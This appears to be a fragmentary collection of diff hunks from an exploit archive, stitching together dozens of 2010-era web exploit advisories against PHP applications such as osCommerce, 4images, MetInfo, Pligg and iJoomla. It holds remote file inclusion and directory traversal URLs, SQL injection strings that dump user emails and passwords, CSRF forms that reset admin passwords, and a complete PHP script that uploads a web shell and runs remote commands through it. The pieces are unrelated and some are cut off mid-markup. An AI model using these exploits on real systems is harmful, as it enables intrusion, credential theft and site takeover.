($recordSet->fields['usersavedsearches_query_string']) . '">' . $title . '</a>
|
($recordSet->fields['usersavedsearches_query_string']) . '">' . $title . '</a>
|
||||||
<div class="note"><a href="index.php?action=delete_search&
|
<div class="note"><a href="index.php?action=delete_search&
|
||||||
searchID=' . $misc->make_db_unsafe($recordSet->fields['usersavedsearches_id']) . '"
|
searchID=' . $misc->make_db_unsafe($recordSet->fields['usersavedsearches_id']) . '"
|
||||||
onclick="return confirmDelete()">' . $lang['delete_search'] . '</a></div><br /><br />';
|
onclick="return confirmDelete()">' . $lang['delete_search'] . '</a></div><br /><br />';
|
||||||
|
|
||||||
|
|
|
@ -1,12 +1,12 @@
|
||||||
# Exploit Title: [MailForm Remote File Include ]
|
# Exploit Title: [MailForm Remote File Include ]
|
||||||
# Date: [14-8-2010]
|
# Date: [14-8-2010]
|
||||||
# Author: LoSt.HaCkEr / aDaM_TRoJaN
|
# Author: LoSt.HaCkEr / aDaM_TRoJaN
|
||||||
# Software Link: [http://scripts.bdr130.net/files/any/MailForm.zip]
|
# Software Link: [http://scripts.bdr130.net/files/any/MailForm.zip]
|
||||||
# Version: [v 1.2 ]
|
# Version: [v 1.2 ]
|
||||||
# Tested on: [Windows XP]
|
# Tested on: [Windows XP]
|
||||||
# CVE : [هكر المسيب]
|
# CVE : [هكر المسيب]
|
||||||
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/ aDaM_TRoJaN@yahoo.com
|
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/ aDaM_TRoJaN@yahoo.com
|
||||||
+++++++++++++++++++++++++++++++++++++++++++++++++++++
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||||
Exploit: http://target/MailForm/HTML/index.php?theme=[EV!L]
|
Exploit: http://target/MailForm/HTML/index.php?theme=[EV!L]
|
||||||
+++++++++++++++++++++++++++++++++++++++++++++++++++++
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||||
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
|
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
|
|
@ -1,12 +1,12 @@
|
||||||
# Exploit Title: [4images1.7.8 Remote File Include ]
|
# Exploit Title: [4images1.7.8 Remote File Include ]
|
||||||
# Date: [23-8-2010]
|
# Date: [23-8-2010]
|
||||||
# Author: LoSt.HaCkEr / aDaM_TRoJaN
|
# Author: LoSt.HaCkEr / aDaM_TRoJaN
|
||||||
# Software Link: [http://www.4homepages.de/4images/download.php]
|
# Software Link: [http://www.4homepages.de/4images/download.php]
|
||||||
# Version: [v 1.7.8 ]
|
# Version: [v 1.7.8 ]
|
||||||
# Tested on: [Windows XP]
|
# Tested on: [Windows XP]
|
||||||
# CVE :
|
# CVE :
|
||||||
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/ aDaM_TRoJaN@yahoo.com
|
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/ aDaM_TRoJaN@yahoo.com
|
||||||
+++++++++++++++++++++++++++++++++++++++++++++++++++++
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||||
Exploit: http://target/4images1.7.8/4images/global.php?db_servertype=[SHeLL]
|
Exploit: http://target/4images1.7.8/4images/global.php?db_servertype=[SHeLL]
|
||||||
+++++++++++++++++++++++++++++++++++++++++++++++++++++
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||||
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
|
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
|
|
@ -1,12 +1,12 @@
|
||||||
# Exploit Title: [oscommerce-3.0a5 Remote File Inclusion ]
|
# Exploit Title: [oscommerce-3.0a5 Remote File Inclusion ]
|
||||||
# Date: [26-8-2010]
|
# Date: [26-8-2010]
|
||||||
# Author: LoSt.HaCkEr / aDaM_TRoJaN
|
# Author: LoSt.HaCkEr / aDaM_TRoJaN
|
||||||
# Software Link: [http://www.oscommerce.com/solutions/downloads]
|
# Software Link: [http://www.oscommerce.com/solutions/downloads]
|
||||||
# Version: [v 3.0 ]
|
# Version: [v 3.0 ]
|
||||||
# Tested on: [Windows XP]
|
# Tested on: [Windows XP]
|
||||||
# CVE :
|
# CVE :
|
||||||
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/ aDaM_TRoJaN@yahoo.com
|
#Contact: LoSt.HaCkEr[at]yahoo[dot]com /0r/ aDaM_TRoJaN@yahoo.com
|
||||||
+++++++++++++++++++++++++++++++++++++++++++++++++++++
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||||
Exploit: http://target/oscommerce-3.0a5/oscommerce-3.0a5/oscommerce/includes/classes/actions.php?module=[SHeLL]
|
Exploit: http://target/oscommerce-3.0a5/oscommerce-3.0a5/oscommerce/includes/classes/actions.php?module=[SHeLL]
|
||||||
+++++++++++++++++++++++++++++++++++++++++++++++++++++
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||||
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
|
A special tribute to: DannY.iRaQi - TeaM iRaQ HaCkers
|
|
@ -8,24 +8,24 @@
|
||||||
<body bgcolor="#000000" style="background-attachment: fixed" background="http://www.sa-virus.com/reno/bg.gif">
|
<body bgcolor="#000000" style="background-attachment: fixed" background="http://www.sa-virus.com/reno/bg.gif">
|
||||||
<p
|
<p
|
||||||
align="left"><font size="5"
|
align="left"><font size="5"
|
||||||
color="#FFFFFF"><b>
|
color="#FFFFFF"><b>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
</b></font><b><font color="#FFFFFF" size="5">Pc4Uploader - [XSRF ] Add Admin
|
</b></font><b><font color="#FFFFFF" size="5">Pc4Uploader - [XSRF ] Add Admin
|
||||||
Exploit<br>
|
Exploit<br>
|
||||||
|
|
||||||
|
|
||||||
Author : RENO<br>
|
Author : RENO<br>
|
||||||
|
|
||||||
TeaM : SauDi ViRuS TeaM<br>
|
TeaM : SauDi ViRuS TeaM<br>
|
||||||
|
|
||||||
|
|
||||||
Site : <a href="http://WwW.Sa-ViRuS.CoM">WwW.Sa-ViRuS.CoM</a><br>
|
Site : <a href="http://WwW.Sa-ViRuS.CoM">WwW.Sa-ViRuS.CoM</a><br>
|
||||||
|
|
||||||
|
|
||||||
Email : R7e@HoTMaiL.coM</font></b></p>
|
Email : R7e@HoTMaiL.coM</font></b></p>
|
||||||
<p align="center"> </p>
|
<p align="center"> </p>
|
||||||
<p align="center"> </p>
|
<p align="center"> </p>
|
||||||
|
|
||||||
<svt>
|
<svt>
|
||||||
<center>
|
<center>
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
# Exploit Title: [DiY-CMS 1.0 Remote File Inclusion ]
|
# Exploit Title: [DiY-CMS 1.0 Remote File Inclusion ]
|
||||||
# Date: [28-8-2010]
|
# Date: [28-8-2010]
|
||||||
# Author: LoSt.HaCkEr ~ aDaM_TRoJaN
|
# Author: LoSt.HaCkEr ~ aDaM_TRoJaN
|
||||||
# Software Link: [http://webscripts.softpedia.com/scriptDownload/DiY-CMS-Download-63258.html]
|
# Software Link: [http://webscripts.softpedia.com/scriptDownload/DiY-CMS-Download-63258.html]
|
||||||
# Version: [v 1.0 ]
|
# Version: [v 1.0 ]
|
||||||
# Tested on: [Windows XP]
|
# Tested on: [Windows XP]
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
# Exploit Title: [iJoomla.Magazine.v.3.0.1 Remote File Inclusion ]
|
# Exploit Title: [iJoomla.Magazine.v.3.0.1 Remote File Inclusion ]
|
||||||
# Date: [5-9-2010]
|
# Date: [5-9-2010]
|
||||||
# Author: LoSt.HaCkEr ~ aDaM_TRoJaN
|
# Author: LoSt.HaCkEr ~ aDaM_TRoJaN
|
||||||
# Software Link: [http://www.ijoomla.com/ijoomla-magazine/ijoomla-magazine/index/]
|
# Software Link: [http://www.ijoomla.com/ijoomla-magazine/ijoomla-magazine/index/]
|
||||||
# Version: [v 3.0.1 ]
|
# Version: [v 3.0.1 ]
|
||||||
# Tested on: [Windows XP]
|
# Tested on: [Windows XP]
|
||||||
|
@ -9,4 +9,4 @@
|
||||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||||
Exploit: http://iJoomla.Magazine.v.3.0.1-_TKT_/com_magazine_3_0_1/magazine.functions.php?config=[SHeLL]
|
Exploit: http://iJoomla.Magazine.v.3.0.1-_TKT_/com_magazine_3_0_1/magazine.functions.php?config=[SHeLL]
|
||||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[~]
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[~]
|
||||||
Greetings: No
|
Greetings: No
|
|
@ -2,17 +2,17 @@
|
||||||
Date : Sep 6, 2010
|
Date : Sep 6, 2010
|
||||||
Author: Saxtor {Location: South America (Guyana)}
|
Author: Saxtor {Location: South America (Guyana)}
|
||||||
Email: admin@saxtorinc.com
|
Email: admin@saxtorinc.com
|
||||||
Category:: Web Applications
|
Category:: Web Applications
|
||||||
Verison: 5.5
|
Verison: 5.5
|
||||||
|
|
||||||
|
|
||||||
suffers a directory traversal
|
suffers a directory traversal
|
||||||
vulnerability. This vulnerability could allow
|
vulnerability. This vulnerability could allow
|
||||||
attackers to read arbitrary files =>
|
attackers to read arbitrary files =>
|
||||||
------------------------------
|
------------------------------
|
||||||
http://localhost/Javabridge/source.php?source=/etc/passwd
|
http://localhost/Javabridge/source.php?source=/etc/passwd
|
||||||
------------------------------
|
------------------------------
|
||||||
*/
|
*/
|
||||||
<?php
|
<?php
|
||||||
|
|
||||||
/**
|
/**
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
[x] Exploit Title: [FCMS_2.2.3 Remote File Inclusion ]
|
[x] Exploit Title: [FCMS_2.2.3 Remote File Inclusion ]
|
||||||
[x] Date: 10-9-2010]
|
[x] Date: 10-9-2010]
|
||||||
[x] Author: LoSt.HaCkEr ~ aDaM_TRoJaN
|
[x] Author: LoSt.HaCkEr ~ aDaM_TRoJaN
|
||||||
[x] Software Link: [http://www.familycms.com/getstarted.php]
|
[x] Software Link: [http://www.familycms.com/getstarted.php]
|
||||||
[x] Version: [v 2.2.3 ]
|
[x] Version: [v 2.2.3 ]
|
||||||
[x]Tested on: [Windows XP]
|
[x]Tested on: [Windows XP]
|
||||||
|
@ -11,4 +11,4 @@
|
||||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||||
[x]Exploit: http://target/FCMS_2.2.3/FCMS_2.2.3/settings.php?current_user_id=[SHeLL]
|
[x]Exploit: http://target/FCMS_2.2.3/FCMS_2.2.3/settings.php?current_user_id=[SHeLL]
|
||||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||||
[x]Greetings: No Greet
|
[x]Greetings: No Greet
|
|
@ -19,34 +19,34 @@ set_time_limit(0);
|
||||||
ini_set("default_socket_timeout", 5);
|
ini_set("default_socket_timeout", 5);
|
||||||
function http_send($host, $packet)
|
function http_send($host, $packet)
|
||||||
{
|
{
|
||||||
$sock = fsockopen($host, 80);
|
$sock = fsockopen($host, 80);
|
||||||
while (!$sock)
|
while (!$sock)
|
||||||
{
|
{
|
||||||
print "\n[-] No response from {$host}:80 Trying again...";
|
print "\n[-] No response from {$host}:80 Trying again...";
|
||||||
$sock = fsockopen($host, 80);
|
$sock = fsockopen($host, 80);
|
||||||
}
|
}
|
||||||
fputs($sock, $packet);
|
fputs($sock, $packet);
|
||||||
while (!feof($sock)) $resp .= fread($sock, 1024);
|
while (!feof($sock)) $resp .= fread($sock, 1024);
|
||||||
fclose($sock);
|
fclose($sock);
|
||||||
return $resp;
|
return $resp;
|
||||||
}
|
}
|
||||||
print "\n+------------------------------------------------------------+";
|
print "\n+------------------------------------------------------------+";
|
||||||
print "\n| MetInfo 3.0 File Upload (fckeditor) sh3n |";
|
print "\n| MetInfo 3.0 File Upload (fckeditor) sh3n |";
|
||||||
print "\n+------------------------------------------------------------+\n";
|
print "\n+------------------------------------------------------------+\n";
|
||||||
if ($argc < 2)
|
if ($argc < 2)
|
||||||
{
|
{
|
||||||
print "\nUsage......: php $argv[0] metinfo.pe path";
|
print "\nUsage......: php $argv[0] metinfo.pe path";
|
||||||
print "\nExample....: php $argv[0] localhost /fckeditor/\n";
|
print "\nExample....: php $argv[0] localhost /fckeditor/\n";
|
||||||
die();
|
die();
|
||||||
}
|
}
|
||||||
$host = $argv[1];
|
$host = $argv[1];
|
||||||
$path = $argv[2];
|
$path = $argv[2];
|
||||||
$data = "--xSsT0rm\r\n";
|
$data = "--xSsT0rm\r\n";
|
||||||
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh3n.php.pdf\"\r\n";
|
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh3n.php.pdf\"\r\n";
|
||||||
$data .= "Content-Type: application/octet-stream\r\n\r\n";
|
$data .= "Content-Type: application/octet-stream\r\n\r\n";
|
||||||
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
|
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
|
||||||
$data .= "----xSsT0rm--\r\n";
|
$data .= "----xSsT0rm--\r\n";
|
||||||
$packet = "POST {$path}/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.0\r\n";
|
$packet = "POST {$path}/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.0\r\n";
|
||||||
$packet .= "Host: {$host}\r\n";
|
$packet .= "Host: {$host}\r\n";
|
||||||
$packet .= "Content-Length: ".strlen($data)."\r\n";
|
$packet .= "Content-Length: ".strlen($data)."\r\n";
|
||||||
$packet .= "Content-Type: multipart/form-data; boundary=xSsT0rm\r\n";
|
$packet .= "Content-Type: multipart/form-data; boundary=xSsT0rm\r\n";
|
||||||
|
@ -58,19 +58,19 @@ else print "\n[-] Shell uploaded to {$html[2]}...have phun!\n";
|
||||||
define(STDIN, fopen("php://stdin", "r"));
|
define(STDIN, fopen("php://stdin", "r"));
|
||||||
while(1)
|
while(1)
|
||||||
{
|
{
|
||||||
print "\nsh3n-box# ";
|
print "\nsh3n-box# ";
|
||||||
$cmd = trim(fgets(STDIN));
|
$cmd = trim(fgets(STDIN));
|
||||||
if ($cmd != "exit")
|
if ($cmd != "exit")
|
||||||
{
|
{
|
||||||
$packet = "GET {$path}upload/{$html[3]} HTTP/1.0\r\n";
|
$packet = "GET {$path}upload/{$html[3]} HTTP/1.0\r\n";
|
||||||
$packet.= "Host: {$host}\r\n";
|
$packet.= "Host: {$host}\r\n";
|
||||||
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
|
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
|
||||||
$packet.= "Connection: close\r\n\r\n";
|
$packet.= "Connection: close\r\n\r\n";
|
||||||
$output = http_send($host, $packet);
|
$output = http_send($host, $packet);
|
||||||
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
|
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
|
||||||
$shell = explode("_code_", $output);
|
$shell = explode("_code_", $output);
|
||||||
print "\n{$shell[1]}";
|
print "\n{$shell[1]}";
|
||||||
}
|
}
|
||||||
else break;
|
else break;
|
||||||
}
|
}
|
||||||
?>
|
?>
|
|
@ -8,4 +8,4 @@ Sql Injection :
|
||||||
http://localhost/[path]/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00
|
http://localhost/[path]/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00
|
||||||
################################################################################################################
|
################################################################################################################
|
||||||
Thanks Cyber-Warrior.org & AKINCILAR
|
Thanks Cyber-Warrior.org & AKINCILAR
|
||||||
################################################################################################################
|
################################################################################################################
|
|
@ -18,7 +18,7 @@ Description: Change the admin password of the admin panel of oscommerce.And then
|
||||||
<form name="administrator" action="http:/server/linktoadminpanel/administrators.php/login.php?aID=1&action=save" method="post"> Change Admin Pass
|
<form name="administrator" action="http:/server/linktoadminpanel/administrators.php/login.php?aID=1&action=save" method="post"> Change Admin Pass
|
||||||
Username<br><input type="text" name="username" value="admin">
|
Username<br><input type="text" name="username" value="admin">
|
||||||
<br>Password<br><input type="password" name="password" maxlength="40"></td>
|
<br>Password<br><input type="password" name="password" maxlength="40"></td>
|
||||||
<br><input type="submit" alt="Update" title=" Update " value="Change It!"> <a href="http://server/linktoadminpanel/administrators.php/login.php?aID=1"> </a>
|
<br><input type="submit" alt="Update" title=" Update " value="Change It!"> <a href="http://server/linktoadminpanel/administrators.php/login.php?aID=1"> </a>
|
||||||
</form>
|
</form>
|
||||||
</BODY></HTML>
|
</BODY></HTML>
|
||||||
----------------------------
|
----------------------------
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
[+]Exploit Title: [awcm v2.1 final Remote File Inclusion]
|
[+]Exploit Title: [awcm v2.1 final Remote File Inclusion]
|
||||||
[+]Date: [13-11-2010]
|
[+]Date: [13-11-2010]
|
||||||
[+]Author: LoSt.HaCkEr ~ aDaM_TRoJaN
|
[+]Author: LoSt.HaCkEr ~ aDaM_TRoJaN
|
||||||
[+]Software Link: [www.awcm-cms.com]
|
[+]Software Link: [www.awcm-cms.com]
|
||||||
[+]Version: [v2.1]
|
[+]Version: [v2.1]
|
||||||
[+]CVE :I'M IRaQi ~ Hacker town of Musayyib
|
[+]CVE :I'M IRaQi ~ Hacker town of Musayyib
|
||||||
|
@ -12,4 +12,4 @@ http://sourceforge.net/projects/awcm/files/
|
||||||
[+]Exploit: http://target/awcm v2.1 final/awcm/header.php?theme_file=[EV!L]
|
[+]Exploit: http://target/awcm v2.1 final/awcm/header.php?theme_file=[EV!L]
|
||||||
|
|
||||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||||
Greetings: No Greet !_!
|
Greetings: No Greet !_!
|
|
@ -104,7 +104,7 @@ Hide Email ? (Email Göster Gizle)
|
||||||
<td class="liste-veri3" bgcolor="#ffffff" align="left">
|
<td class="liste-veri3" bgcolor="#ffffff" align="left">
|
||||||
<label style="cursor: pointer;">
|
<label style="cursor: pointer;">
|
||||||
<input type=radio name="posta_goster" value="1" >
|
<input type=radio name="posta_goster" value="1" >
|
||||||
Evet</label>
|
Evet</label>
|
||||||
<label style="cursor: pointer;">
|
<label style="cursor: pointer;">
|
||||||
<input type="radio" name="posta_goster" value="0" checked="checked">
|
<input type="radio" name="posta_goster" value="0" checked="checked">
|
||||||
Hayýr</label>
|
Hayýr</label>
|
||||||
|
@ -115,7 +115,7 @@ Doðum tarihi
|
||||||
<td class="liste-veri3" bgcolor="#ffffff" align="left">
|
<td class="liste-veri3" bgcolor="#ffffff" align="left">
|
||||||
<label style="cursor: pointer;">
|
<label style="cursor: pointer;">
|
||||||
<input type="radio" name="dogum_tarihi_goster" value="1" checked="checked">
|
<input type="radio" name="dogum_tarihi_goster" value="1" checked="checked">
|
||||||
Evet</label>
|
Evet</label>
|
||||||
|
|
||||||
<label style="cursor: pointer;">
|
<label style="cursor: pointer;">
|
||||||
<input type="radio" name="dogum_tarihi_goster" value="0" >
|
<input type="radio" name="dogum_tarihi_goster" value="0" >
|
||||||
|
@ -127,7 +127,7 @@ Sehir Göster Gizle
|
||||||
<td class="liste-veri3" bgcolor="#ffffff" align="left">
|
<td class="liste-veri3" bgcolor="#ffffff" align="left">
|
||||||
<label style="cursor: pointer;">
|
<label style="cursor: pointer;">
|
||||||
<input type="radio" name="sehir_goster" value="1" checked="checked">
|
<input type="radio" name="sehir_goster" value="1" checked="checked">
|
||||||
Evet</label>
|
Evet</label>
|
||||||
|
|
||||||
<label style="cursor: pointer;">
|
<label style="cursor: pointer;">
|
||||||
|
|
||||||
|
@ -145,7 +145,7 @@ Online - Offline Göster Gizle
|
||||||
<label style="cursor: pointer;">
|
<label style="cursor: pointer;">
|
||||||
|
|
||||||
<input type="radio" name="gizli" value="0" checked="checked">
|
<input type="radio" name="gizli" value="0" checked="checked">
|
||||||
Evet</label>
|
Evet</label>
|
||||||
|
|
||||||
<label style="cursor: pointer;">
|
<label style="cursor: pointer;">
|
||||||
<input type="radio" name="gizli" value="1" >
|
<input type="radio" name="gizli" value="1" >
|
||||||
|
|
|
@ -4,7 +4,7 @@ Special thanks to Eric Heikkinen for patching these quickly.
|
||||||
|
|
||||||
Blind SQL Injection
|
Blind SQL Injection
|
||||||
http://host/pligg_1.1.2/search.php?adv=1&status=
|
http://host/pligg_1.1.2/search.php?adv=1&status=
|
||||||
'and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search
|
'and+sleep(9)or+sleep(9)or+1%3D' &search=on&advancesearch= Search
|
||||||
+&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0
|
+&sgroup=on&stags=0&slink=on&scategory=on&scomments=0&suser=0
|
||||||
|
|
||||||
XSS:
|
XSS:
|
||||||
|
|
|
@ -16,7 +16,7 @@ The target must be a link to the document root of OpenClassifieds<br>
|
||||||
(If the exploit doesn't immediately reload then blind sqli is
|
(If the exploit doesn't immediately reload then blind sqli is
|
||||||
required, which will take a few minutes ;)<br>
|
required, which will take a few minutes ;)<br>
|
||||||
<form>
|
<form>
|
||||||
Target: <input size=128 name=target value="http://localhost/"><br>
|
Target: <input size=128 name=target value="http://localhost/"><br>
|
||||||
Payload:<input size=128 name=xss value="<script>alert('xss')</script>"><br>
|
Payload:<input size=128 name=xss value="<script>alert('xss')</script>"><br>
|
||||||
<input type=submit value="Attack">
|
<input type=submit value="Attack">
|
||||||
</form><br>
|
</form><br>
|
||||||
|
|
|
@ -401,7 +401,7 @@ report.php
|
||||||
$url = " .$_SERVER[PHP_SELF]";
|
$url = " .$_SERVER[PHP_SELF]";
|
||||||
$count = $row[0];
|
$count = $row[0];
|
||||||
$perpage = 40;list($pagertop, $pagerbottom, $limit) = pager($perpage, $count, $url);
|
$perpage = 40;list($pagertop, $pagerbottom, $limit) = pager($perpage, $count, $url);
|
||||||
print("<BR><b> Current Email Bans ($count)</b>\n");
|
print("<BR><b> Current Email Bans ($count)</b>\n");
|
||||||
|
|
||||||
$url isn't filtered and pager() does not filter anything. So it's vulnerable to XSS.
|
$url isn't filtered and pager() does not filter anything. So it's vulnerable to XSS.
|
||||||
|
|
||||||
|
|
|
@ -27,11 +27,11 @@ expl:
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td align="left" valign="top">Root URL address of your site (with end slash)</td>
|
<td align="left" valign="top">Root URL address of your site (with end slash)</td>
|
||||||
<td align="left" valign="top"> </td>
|
<td align="left" valign="top"> </td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td align="left" valign="top"><input name="home" type="text" class="validate[required] field" id="home" style="width:99%" value="http://www.dgdfgfgdfgdgdfgfdfgdf.com" /></td>
|
<td align="left" valign="top"><input name="home" type="text" class="validate[required] field" id="home" style="width:99%" value="http://www.dgdfgfgdfgdgdfgfdfgdf.com" /></td>
|
||||||
<td align="left" valign="top"> </td>
|
<td align="left" valign="top"> </td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td colspan="2" align="left" valign="top">Your slogan</td>
|
<td colspan="2" align="left" valign="top">Your slogan</td>
|
||||||
|
@ -90,19 +90,19 @@ expl:
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td align="left" valign="top">Password-----just 6 characters</td></td>
|
<td align="left" valign="top">Password-----just 6 characters</td></td>
|
||||||
<td align="left" valign="top"> </td>
|
<td align="left" valign="top"> </td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td align="left" valign="top"><input name="pass" type="password" class="validate[required,length[6,24]] field" id="pass" style="width:99%" value="123456" /></td>
|
<td align="left" valign="top"><input name="pass" type="password" class="validate[required,length[6,24]] field" id="pass" style="width:99%" value="123456" /></td>
|
||||||
<td align="left" valign="top"> </td>
|
<td align="left" valign="top"> </td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td align="left" valign="top">Password again-----just 6 characters</td></td>
|
<td align="left" valign="top">Password again-----just 6 characters</td></td>
|
||||||
<td align="left" valign="top"> </td>
|
<td align="left" valign="top"> </td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td align="left" valign="top"><input name="passco" type="password" class="validate[required,confirm[pass]] field" id="passco" style="width:99%" value="123456" /></td>
|
<td align="left" valign="top"><input name="passco" type="password" class="validate[required,confirm[pass]] field" id="passco" style="width:99%" value="123456" /></td>
|
||||||
<td align="left" valign="top"> </td>
|
<td align="left" valign="top"> </td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td colspan="2" align="left" valign="top"><input name="installed" type="hidden" id="installed" value="true" />
|
<td colspan="2" align="left" valign="top"><input name="installed" type="hidden" id="installed" value="true" />
|
||||||
|
@ -113,7 +113,7 @@ expl:
|
||||||
<td colspan="2" align="center" valign="top"><input type="submit" name="button" id="button" value="Save" class="save" /></td>
|
<td colspan="2" align="center" valign="top"><input type="submit" name="button" id="button" value="Save" class="save" /></td>
|
||||||
</tr>
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td colspan="2" align="center" valign="top"> </td>
|
<td colspan="2" align="center" valign="top"> </td>
|
||||||
</tr>
|
</tr>
|
||||||
</table>
|
</table>
|
||||||
</form>
|
</form>
|
||||||
|
|
|
@ -12,12 +12,12 @@
|
||||||
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
|
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
|
||||||
Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
|
Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
|
||||||
Xarnuz, Truenex
|
Xarnuz, Truenex
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
[POC]
|
[POC]
|
||||||
http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
|
http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,5--
|
||||||
|
|
||||||
http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
|
http://localhost/b2c/index.php?page=pp_productos.php&tipo=1&codf=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,codigousuario,email,password)+from+ph_usuarios--
|
||||||
|
|
||||||
[SQL Injection]
|
[SQL Injection]
|
||||||
|
|
|
@ -17,7 +17,7 @@ Xarnuz, Truenex, TsunamiBoom, _tty0, Big, Sunplace, Killerboy,Erick
|
||||||
Jordan,Animacco,
|
Jordan,Animacco,
|
||||||
yojota, Pablin77, SPEED, Knet, Cereal, Yago, Rash, MagnoBalt, El
|
yojota, Pablin77, SPEED, Knet, Cereal, Yago, Rash, MagnoBalt, El
|
||||||
Rodrix, l0ve, her0
|
Rodrix, l0ve, her0
|
||||||
|
|
||||||
|
|
||||||
[Qcodo Exploit]
|
[Qcodo Exploit]
|
||||||
|
|
||||||
|
|
|
@ -6,7 +6,7 @@
|
||||||
# Software: http://www.telematica.com.ar/tcms.asp
|
# Software: http://www.telematica.com.ar/tcms.asp
|
||||||
# http://www.telematica.com.ar/portfolio.asp
|
# http://www.telematica.com.ar/portfolio.asp
|
||||||
# Tested on: Linux
|
# Tested on: Linux
|
||||||
|
|
||||||
[Comment]
|
[Comment]
|
||||||
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
|
Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
|
||||||
Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
|
Lezaeta, Nicolas Montanaro, Inyexion, Login-Root, KikoArg, Ricota,
|
||||||
|
@ -15,8 +15,8 @@ Jordan,Animacco ,
|
||||||
yojota, Pablin77, SPEED, Knet, Cereal, Yago, Rash, MagnoBalt, El
|
yojota, Pablin77, SPEED, Knet, Cereal, Yago, Rash, MagnoBalt, El
|
||||||
Rodrix, l0ve, NetT0xic,
|
Rodrix, l0ve, NetT0xic,
|
||||||
Gusan0r, Sabertrail, Maxi Soler. Darioxchx,r0dr1,Zer0-Zo0rg
|
Gusan0r, Sabertrail, Maxi Soler. Darioxchx,r0dr1,Zer0-Zo0rg
|
||||||
|
|
||||||
|
|
||||||
[Authentication Bypass]
|
[Authentication Bypass]
|
||||||
|
|
||||||
http://path/admin/
|
http://path/admin/
|
||||||
|
|
|
@ -75,7 +75,7 @@ EZ-Shop is prone to SQL Injection due to insufficent user supplied input sanizat
|
||||||
<tr>
|
<tr>
|
||||||
<td width="50%"><table width="100%" height="170" border="0" cellpadding="0" cellspacing="1" bordercolor="#CCCCCC" class="proborder">
|
